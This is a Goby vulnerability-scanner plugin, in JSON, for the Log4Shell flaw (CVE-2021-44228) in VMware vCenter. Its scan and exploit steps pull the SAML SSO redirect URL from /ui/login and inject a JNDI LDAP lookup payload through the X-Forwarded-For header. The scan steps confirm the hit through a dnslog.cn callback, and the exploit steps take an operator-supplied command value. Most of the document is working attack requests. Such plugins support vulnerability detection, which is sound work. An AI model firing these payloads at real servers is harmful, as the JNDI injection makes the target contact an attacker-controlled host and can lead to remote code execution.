{ "Name": "VMware vCenter Log4shell CVE-2021-44228 (1)", "Level": "3", "Tags": [ "rce" ], "GobyQuery": "app=\"VMware-vCenter\" || body=\"vsphere-client/\" || title=\"VMware vSphere\"", "Description": "VMware vCenter Server is advanced server management software that provides a centralized platform for controlling your VMware vSphere environments, allowing you to automate and deliver a virtual infrastructure across the hybrid cloud with confidence.", "Product": "VMware vCenter", "Homepage": "https://www.vmware.com/", "Author": "", "Impact": "The vsphere-client /websso/SAML2/SSO/ address has a log4j vulnerability.", "Recommendation": "", "References": [ "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis" ], "HasExp": true, "ExpParams": [ { "Name": "cmd", "Type": "input", "Value": "${jndi:ldap://dns.log/tea}" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/ui/login", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "302", "bz": "" } ] }, "SetVariable": [ "vmid|lastheader|regex|(/websso/SAML2/SSO/.*SAMLRequest=)" ] }, { "Request": { "method": "GET", "uri": "http://www.dnslog.cn/getdomain.php", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "dnstest|lastbody||" ] }, { "Request": { "method": "GET", "uri": "{{{vmid}}}", "follow_redirect": false, "header": { "X-Forwarded-For": "${jndi:ldap://{{{dnstest}}}/tea}" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [] }, "SetVariable": [ "output|lastbody|regex|" ] }, { "Request": { "method": "GET", "uri": "http://www.dnslog.cn/getrecords.php", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "{{{dnstest}}}", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/ui/login", "follow_redirect": false, "header": null, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "302", "bz": "" } ] }, "SetVariable": [ "vmid|lastbody|regex|(/websso/SAML2/SSO/.*SAMLRequest=)" ] }, { "Request": { "method": "GET", "uri": "{{{vmid}}}", "follow_redirect": false, "header": { "X-Forwarded-For": "{{{cmd}}}" }, "data_type": "text", "data": "", "set_variable": [] }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [] }, "SetVariable": [ "output|lastbody|regex|" ] } ], "PostTime": "0000-00-00 00:00:00", "GobyVersion": "0.0.0" }